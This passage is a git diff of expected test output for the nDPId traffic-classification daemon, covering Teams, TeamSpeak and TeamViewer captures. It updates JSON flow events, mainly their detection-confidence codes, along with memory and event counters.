{"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1587041686889,"flow_last_seen":1587041687253,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10175,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1090,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685171,"flow_last_seen":1587041685185,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1587041690916,"flow_last_seen":1587041691089,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8952,"flow_avg_l4_payload_len":426,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1587041697061,"flow_last_seen":1587041697244,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8968,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041687731,"flow_last_seen":1587041687745,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681218,"flow_last_seen":1587041681248,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041675997,"flow_last_seen":1587041676010,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041691075,"flow_last_seen":1587041691148,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041694221,"flow_last_seen":1587041694234,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} 
-00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685093,"flow_last_seen":1587041685127,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","packets-captured":2817,"packets-processed":2775,"total-skipped-flows":0,"total-l4-payload-len":1327851,"total-not-detected-flows":1,"total-guessed-flows":2,"total-detected-flows":80,"total-detection-updates":50,"total-updates":0,"current-active-flows":0,"total-active-flows":83,"total-idle-flows":83,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":597,"global_ts_msec":1587041698021} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685171,"flow_last_seen":1587041685185,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1587041690916,"flow_last_seen":1587041691089,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8952,"flow_avg_l4_payload_len":426,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1587041697061,"flow_last_seen":1587041697244,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8968,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041687731,"flow_last_seen":1587041687745,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681218,"flow_last_seen":1587041681248,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041675997,"flow_last_seen":1587041676010,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041691075,"flow_last_seen":1587041691148,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041694221,"flow_last_seen":1587041694234,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685093,"flow_last_seen":1587041685127,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","packets-captured":2817,"packets-processed":2775,"total-skipped-flows":0,"total-l4-payload-len":1327851,"total-not-detected-flows":1,"total-guessed-flows":2,"total-detected-flows":80,"total-detection-updates":59,"total-updates":0,"current-active-flows":0,"total-active-flows":83,"total-idle-flows":83,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":606,"global_ts_msec":1587041698021} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2817/2775 ~~ skipped flows.............: 0 
@@ -603,9 +612,9 @@ ~~ total active/idle flows...: 83/83 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 7284384 bytes -~~ total memory freed........: 7284384 bytes -~~ total allocations/frees...: 121678/121678 +~~ total memory allocated....: 6733827 bytes +~~ total memory freed........: 6733827 bytes +~~ total allocations/frees...: 124322/124322 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 184 chars ~~ json string max len.......: 1949 chars diff --git a/test/results/teamspeak3.pcap.out b/test/results/teamspeak3.pcap.out index 6863774ab..74b8af7ee 100644 --- a/test/results/teamspeak3.pcap.out +++ b/test/results/teamspeak3.pcap.out 
@@ -2,10 +2,10 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"teamspeak3.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946745680740} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946745680740,"flow_last_seen":946745680740,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":946745680740,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"10.0.0.2","src_port":53187,"dst_port":9987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946745680740,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":946745680740,"pkt":"REREREREZmZmZmZmCABFAAA+yVhAAHgRnjQKAAABCgAAAs\/DJwMAKptdVFMzSU5JVDEAZQAAiA3QV2YAX1kW4K3na2EAAAAAAAAAAA=="} 
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946745680740,"flow_last_seen":946745680740,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":946745680740,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"10.0.0.2","src_port":53187,"dst_port":9987,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TeamSpeak","breed":"Acceptable","category":"VoIP"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946745680740,"flow_last_seen":946745680740,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":946745680740,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"10.0.0.2","src_port":53187,"dst_port":9987,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TeamSpeak","breed":"Acceptable","category":"VoIP"}} 00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946745680740,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":946745680740,"pkt":"REREREREZmZmZmZmCABFAADYyVlAAHgRnZkKAAABCgAAAs\/DJwMAxJv3eXRj6JO6fmAAAAAAIp10i0Wqe++5nv6tCBm6z0HgFqIVc9rwk+JLXtHwnSIOS9qVPnECnykaLcJG8hX08WvnftBqcJmqRqZMetkjLRcZ56Qb0yr7w3DD9zi02VU5x7l+AWx+kCtuxsALbdDKU+g3u9+7M\/R0k3h6Cj2dgqVHMwYrJL8wicW8AZK\/KfPOtEoKiRpNuYkxO9WWvZSdqdAZVZGl4X6vDNBIwrDu7kll5TuFIGNHjpSa9tdfD6M="} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946745681306,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":946745681306,"pkt":"REREREREZmZmZmZmCABFAAA+yX1AAHgRng8KAAABCgAAAs\/DJwMAKptdVFMzSU5JVDEAZQAAiA3QV2YAX1kW4K3na2IAAAAAAAAAAA=="} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":946745680740,"flow_last_seen":946745717746,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":1365,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":946745717746,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"10.0.0.2","src_port":53187,"dst_port":9987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TeamSpeak","breed":"Acceptable","category":"VoIP"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":946745680740,"flow_last_seen":946745717746,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":1365,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":946745717746,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"10.0.0.2","src_port":53187,"dst_port":9987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TeamSpeak","breed":"Acceptable","category":"VoIP"}} 
00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":13,"source":"teamspeak3.pcap","alias":"nDPId-test","packets-captured":13,"packets-processed":13,"total-skipped-flows":0,"total-l4-payload-len":1365,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":946745717746} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 13/13 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869820 bytes -~~ total memory freed........: 5869820 bytes -~~ total allocations/frees...: 118127/118127 +~~ total memory allocated....: 6003454 bytes +~~ total memory freed........: 6003454 bytes +~~ total allocations/frees...: 120889/120889 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 695 chars diff --git a/test/results/teamviewer.pcap.out b/test/results/teamviewer.pcap.out index 547772910..79611860c 100644 --- a/test/results/teamviewer.pcap.out +++ b/test/results/teamviewer.pcap.out 
@@ -3,15 +3,15 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":330297,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":330297,"pkt":"UlQAEjUCCAAns+YuCABFAAA8OlxAAEAGTq0KAAIPovoCqouUFzIpaMgpAAAAAKAC+vCAjgAAAgQFtAQCCAosLVpIAAAAAAEDAwc="} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":330433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":330433,"pkt":"CAAns+YuUlQAEjUCCABFAAAsCdUAAEAGv0Si+gKqCgACDxcyi5QCaioBKWjIKmAS\/\/8lnwAAAgQFtA=="} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":330434,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":330434,"pkt":"UlQAEjUCCAAns+YuCABFAAAoOl1AAEAGTsAKAAIPovoCqouUFzIpaMgqAmoqAlAQ+vBCawAAAAAAAAAA"} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":330297,"flow_last_seen":330434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":330434,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.250.2.170","src_port":35732,"dst_port":5938,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":330297,"flow_last_seen":330434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":330434,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.250.2.170","src_port":35732,"dst_port":5938,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":520136,"flow_last_seen":520136,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":520136,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.47.224.241","src_port":34417,"dst_port":36037,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 